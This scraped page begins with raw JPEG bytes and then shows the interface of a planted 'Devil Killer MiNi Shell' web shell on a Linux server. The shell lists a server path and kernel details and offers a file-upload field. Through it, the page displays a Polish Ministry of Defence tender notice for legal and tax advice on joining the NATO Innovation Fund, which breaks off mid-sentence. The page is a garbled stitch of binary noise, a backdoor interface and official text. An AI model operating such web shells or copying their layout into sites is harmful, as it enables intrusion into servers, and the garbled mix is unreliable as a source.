JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220615/0021197801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa prawna w zakresie doradztwa prawno-podatkowego przy transakcji przystąpienia do Funduszu Innowacyjności NATO na prawie luksemburskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Obrony Narodowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014872806</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Niepodległości 218</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-911</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mon.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/obrona-narodowa</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa prawna w zakresie doradztwa prawno-podatkowego przy transakcji przystąpienia do Funduszu Innowacyjności NATO na prawie luksemburskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2befb40a-ebb5-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00211978</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/damon <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Zamawiający na podstawie art. 280 ust. 2 ustawy pzp, z uwagi na sytuację określoną w art. 65 ust. 1 udostępnia część SWZ w sposób określony w niniejszym rozdziale. Zamawiający przewiduje udostępnienie dokumentacji (rekomendowane, ale nieobowiązkowe, na wniosek wykonawców)<br/>1.	Na wniosek wykonawcy, zamawiający udostępni dokumentację o poufnym charakterze (dalej: dokumentacja wrażliwa), będącą przedmiotem analizy i tłumaczenia: - umowa „Limited Partnership Agreement” – LPA.<br/>3. Sposób przekazywania dokumentacji wrażliwej:<br/>1)	wykonawca zwraca się z wnioskiem do zamawiającego o przekazanie dokumentacji wrażliwej. Dokumentacja zostanie przesłana drogą elektroniczną, na adres e-mail podany we wniosku lub przekazana w formie papierowej wskazanej osobie w siedzibie zamawiającego,<br/>2)	w przypadku niewskazania przez wykonawcę właściwego adresu lub osoby, zamawiający pozostawi wniosek bez rozpoznania;<br/>3)	wniosek powinien zawierać w szczególności:<br/>a)	nazwę i adres wykonawcy (wnioskodawcy);<br/>b)	imię i nazwisko osoby lub osób, które będą miały dostęp do dokumentacji oraz służbowy adres e-mail.<br/>4.	Do wniosku o przekazanie dokumentów wrażliwych wykonawca dołączy:<br/>a)	oświadczenie wykonawcy o nieudostępnianiu przekazanej dokumentacji wrażliwej innym osobom i podmiotom nie związanym z przygotowaniem oferty oraz ich publikacją (m. in. w Internecie),<br/>b)	zobowiązanie wykonawcy do zniszczenia wszelkich kopii i ich usunięcia <br/>z informatycznych nośników danych przekazanej dokumentacji wrażliwej na użytek (potrzebę) przygotowania przez wykonawcę oferty do dnia składania ofert.<br/>c)	zobowiązanie wykonawcy do zwrotu otrzymanej dokumentacji wrażliwej od Zamawiającego do dnia składania ofert,<br/>d)	upoważnienie wydane przez wykonawcę dla osoby odbierającej dokumentację wrażliwą od zamawiającego w przypadku określenia odbioru dokumentacji wrażliwej we wniosku w siedzibie zamawiającego.<br/>5.	Do zwracanej do dnia składania ofert dokumentacji wrażliwej (przekazanej przez zamawiającego) wykonawca dodatkowo dołączy:<br/>a)	oświadczenie wykonawcy o zniszczeniu wszelkich kopii i ich usunięciu <br/>z informatycznych nośników danych otrzymanej dokumentacji wrażliwej;<br/>b)	potwierdzony przez wykonawcę wykaz osób zapoznanych z przekazaną dokumentacją wrażliwą.<br/>Zamawiający zaleca, aby dostęp do wskazanego przez wykonawcę adresu e-mail, na który zostanie przesłana dokumentacja wrażliwa był ograniczony.<br/>Zamawiający zastrzega możliwość nieprzedłużenia terminu składania ofert bez względu na datę złożenia wniosku o przekazanie dokumentacji wrażliwej. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/damon</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a<br/>wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej, zwanej<br/>dalej „platformą zakupową”. 2. Pod pojęciem „platforma zakupowa” należy rozumieć aplikację/program komputerowy przeznaczony<br/>do realizacji procesu związanego z przeprowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego w formie<br/>elektronicznej: 1) zamawiający wykorzystuje platformę zakupową Open Nexus sp. z o.o.; 2) adres strony internetowej platformy<br/>zakupowej:<br/>https://platformazakupowa.pl/pn/damon 3. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452),<br/>określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformie zakupowej, tj.:1) stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 2) komputer klasy PC lub MAC o następującej<br/>konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS<br/>Windows 7, Mac Os x 10 4, Linux, lub ich<br/>nowsze wersje; 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.; 4)<br/>włączona obsługa JavaScript; 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf; 6)<br/>szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.; 7) oznaczenie czasu odbioru danych przez<br/>platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z<br/>zegarem Głównego Urzędu Miar. 4. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w<br/>zakładce „Regulamin&#34; oraz uznaje go za wiążący: https://platformazakupowa.pl/strona/1-regulamin; 2) zapoznał i stosuje się do<br/>Instrukcji składania ofert: https://platformazakupowa.pl/strona/45-instrukcje. 5. Zamawiający nie ponosi odpowiedzialności za<br/>złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl. 6. Zamawiający informuje, że instrukcje<br/>korzystania z platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. 7. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp, składa<br/>się, pod rygorem nieważności, w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, zgodnie z art. 63 ust. 2 ustawy pzp. 8. Podpisy<br/>kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać Rozporządzenie Parlamentu<br/>Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku<br/>wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ochrona danych osobowych1. Zgodnie z art. 13 ust. 1 i 2 RODO tj. rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o<br/>ochronie danych), zamawiający informuje wykonawcę, że: 1) administratorem danych osobowych jest Minister Obrony<br/>Narodowej/Ministerstwo Obrony Narodowej z siedzibą w Warszawie, przy al. Niepodległości 218, tel. +48 22 628 00 31; 2)<br/>administrator wyznaczył Inspektora Ochrony Danych, z<br/>którym można się kontaktować poprzez pocztę elektroniczną na adres: iod@mon.gov.pl lub listownie na adres: Ministerstwo Obrony<br/>Narodowej, al. Niepodległości 218, 00–911 Warszawa, z dopiskiem „Inspektor Ochrony Danych”; 3) dane osobowe będą<br/>przetwarzane w celu przeprowadzenia<br/>przedmiotowego postępowania o udzielenie zamówienia publicznego, na podstawie art. 6 ust. 1 lit. c RODO; 4) dane osobowe mogą<br/>być przekazywane podmiotom przetwarzającym dane osobowe na zlecenie administratora, a także osobom lub podmiotom, którym<br/>udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy pzp; 5) dane osobowe nie będą przekazywane do państwa trzeciego ani<br/>organizacji międzynarodowej; 6) dane osobowe pozyskane w związku z postępowaniem będą przechowywane, przez okres 5 lat od<br/>dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres przechowywania obejmuje cały czas trwania umowy; 7)<br/>w odniesieniu do danych osobowych osób uczestniczących w przedmiotowym postępowaniu decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie<br/>do art. 22 RODO; 8) osobie, której dane osobowe dotyczą przysługują prawa określone w rozdziale 3 SWZ. 9) osobie, której dane<br/>osobowe dotyczą nie przysługują prawa określone w rozdziale 3 SWZ. 10) obowiązek podania przez wykonawcę danych osobowych<br/>bezpośrednio jego dotyczących oraz danych osobowych osób uczestniczących w postępowaniu jest wymogiem określonym w<br/>przepisach ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych<br/>danych wynikają z ustawy pzp. 2. Wykonawca ubiegając się o udzielenie zamówienia jest zobowiązany do wypełnienia wszystkich<br/>obowiązków formalno – prawnych związanych z udziałem w postępowaniu, w tym obowiązków wynikających z RODO. W związku z<br/>powyższym, wykonawca zobowiązany jest do złożenia w postępowaniu o udzielenie zamówienia oświadczenia o wypełnieniu przez<br/>niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO, zgodnie z treścią zawartą w załączniku nr 1 do SWZ.<br/>3. Podwykonawca jest zobowiązany podczas pozyskiwania danych osobowych na potrzeby przedmiotowego postępowania o<br/>udzielenie zamówienia wypełnić obowiązek informacyjny wynikający z RODO względem osób fizycznych, których dane osobowe<br/>dotyczą, i od których dane te bezpośrednio pozyskał. 4. Powyższe postanowienia dotyczą danych osobowych osób<br/>fizycznych, bezpośrednio od nich pozyskanych, a w szczególności danych osobowych wskazanych w rozdziale 3 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">12/ZP/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest usługa w zakresie doradztwa prawnego oraz usługa w zakresie doradztwa podatkowego w celu ustalenia możliwości i konsekwencji prawnych przystąpienia strony polskiej do Funduszu „NATO Innovation Fund” jako Komandytariusz (Limited Partner), w tym analizy umowy inwestycyjnej (Limited Partnership Agreement - LPA) oraz dokumentacji towarzyszącej.<br/>Szczegółowy opis przedmiotu zamówienia zawiera w szczególności:<br/>1)	Załącznik nr 3 do SWZ – Projektowane postanowienia umowy;<br/>2)	Załącznik nr 4 do SWZ – Szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79221000-9 - Usługi w zakresie doradztwa podatkowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający, na podstawie art. 441 ustawy PZP, może skorzystać z prawa opcji w sytuacji uzasadnionej potrzeby związanej z procesem przystąpienia do Funduszu. <br/>Zamawiający zastrzega sobie prawo ewentualnego zwiększenia wielkości zamówienia podstawowego w ramach prawa opcji do wysokości łącznej kwoty 15 000 zł netto i liczby roboczogodzin zaproponowanych przez wykonawcę, nie mniejszej niż 10 roboczogodzin, powyżej liczby określonej w zamówieniu podstawowym.<br/>Zamawiający przewiduje skorzystanie z prawa opcji w zakresie dodatkowych konsultacji zagadnień prawnych i podatkowych związanych z LPA i dokumentacją towarzyszącą, w tym Subscription Agreement w związku <br/>z przystąpieniem zamawiającego do Funduszu i zatwierdzeniem przez Zamawiającego treści LPA i dokumentacji towarzyszącej. <br/>Zamawiający może z prawa opcji nie skorzystać. Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nieskorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium cena (C)<br/><br/>W przypadku kryterium „Cena&#34; Wykonawca otrzyma zaokrągloną do dwóch miejsc po przecinku sumę punktów wynikających z działania: Pi(C) = [C(min) / C(i)x 50] + H gdzie:<br/><br/>Pi(C) = liczba punktów jakie otrzyma oferta badana za kryterium „Cena” (C)<br/>C(min) = najniższa cena spośród wszystkich ważnych ofert<br/>C(i) = cena oferty badanej<br/>50 = oznacza wagę ceny<br/>H – liczba punktów przyznanych w części dotyczącej roboczogodzin w prawie opcji<br/><br/>Wykonawca w kryterium „Cena” w części dotyczącej liczby roboczogodzin w prawie opcji, może otrzymać maksymalnie 5 pkt. Zamawiający przyzna 0,5 pkt za każdą roboczogodzinę konsultacji powyżej określonego minimum 10 roboczogodzin w prawie opcji.<br/>W przypadku niewskazania w ofercie Wykonawcy informacji w zakresie dodatkowej liczby roboczogodzin powyżej określonego minimum, Zamawiający uzna że wykonawca zaoferował 10 godzin i przyzna Wykonawcy 0 pkt w tym kryterium.<br/><br/>Maksymalna liczba punktów jakie może uzyskać Wykonawca w kryterium „Cena” łącznie wynosi 55 pkt.<br/><br/>kryterium społeczne (S):<br/><br/>Kryterium społeczne odnosi się do osób niepełnosprawnych, o których mowa w przepisach o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, zatrudnionych przez Wykonawcę. W przypadku kryterium „Kryterium społeczne” Wykonawca może otrzymać<br/>maksymalnie 5 pkt, gdzie:<br/>a)	Wykonawca, który nie zobowiąże się do zatrudniania osoby niepełnosprawnej, która będzie brała udział w realizacji przedmiotowego zamówienia otrzyma 0 pkt.<br/>b)	Wykonawca, który zobowiąże się do zatrudniania 1 osoby niepełnosprawnej, która będzie brała udział w realizacji przedmiotowego zamówienia Zamawiającego otrzyma 5 pkt,<br/><br/>Maksymalna liczba punktów jakie może uzyskać Wykonawca w tym kryterium to 5 pkt<br/><br/>Kryterium Doświadczenie (D)<br/><br/>Kryterium oceniane będzie w następujący sposób:<br/>Maksymalna liczba punktów do uzyskania: 40<br/>Ze względu na specyfikę zadań wykonywanych przez zamawiającego konieczne jest, aby osoby (Zespół) wykonawcy, wskazany w wykazie osób dysponował kompetencjami <br/>w zakresie doradztwa prawnego opisanego w warunkach udziału w postępowaniu.<br/>Zamawiający przyzna 10 punktów za każdy rok doświadczenia najbardziej doświadczonej osoby z zespołu z tytułem radcy prawnego lub adwokata (tj. doświadczenie zdobyte po uzyskaniu uprawnień zawodowych), ponad liczbę lat doświadczenia zawodowego, wymaganego w warunkach udziału w postępowaniu.<br/><br/>Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie dokonane na podstawie sumy uzyskanych punktów <br/>w kryterium „Cena”, kryterium „Kryterium społeczne” oraz kryterium „Doświadczenie”, zgodnie ze wzorem: R = C + S + D gdzie:<br/>	R – łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów<br/>	C – liczba punktów przyznanych Wykonawcy w kryterium „Cena”<br/>	S – liczba punktów przyznanych Wykonawcy w kryterium „Kryterium społeczne”<br/>	D – liczba punktów przyznanych Wykonawcy w kryterium „Doświadczenie”<br/><br/>Zamawiający wybierze jako najkorzystniejszą ofertę Wykonawcy, który uzyskał najwyższą liczbę punktów w ocenie punktowej. <br/><br/>Szczegółowy opis kryteriów oceny ofert znajduje się w rozdziale 24 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium prawo opcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez wykonawcę ubiegającego się o udzielenia zamówienia, spełnienia warunków<br/>udziału w postępowaniu dotyczących:<br/>zdolności technicznej lub zawodowej:<br/>1. dotyczącej wykonawcy:<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że zrealizował w okresie ostatnich 3 